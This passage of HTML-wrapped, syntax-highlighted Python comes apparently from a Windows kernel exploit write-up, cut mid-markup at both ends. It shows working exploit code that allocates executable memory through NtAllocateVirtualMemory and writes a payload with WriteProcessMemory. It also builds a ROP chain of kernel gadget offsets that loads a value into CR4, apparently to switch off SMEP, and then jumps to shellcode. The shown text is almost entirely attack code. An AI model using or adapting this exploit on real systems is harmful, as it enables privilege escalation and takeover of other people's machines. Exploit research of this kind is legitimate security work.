class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) Error while allocating memory: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">WriteProcessMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) Error while writing our input buffer memory: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">write<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-78\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-81\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x44&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># offset to ip<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># start our rop chain<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x51976f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># pop ecx; ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x75757575<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># junk<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x76767676<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># junk<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># load 0x506f8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x04664f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, [ecx]; ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x22f2da<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov cr4,eax; ret<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &amp;shellcode<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># filler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x43&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argtypes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_ulong<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-100\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-101\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-102\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) error while allocating memory: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-106\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">WriteProcessMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) error while writing our input buffer memory: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">write<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-111\"><span 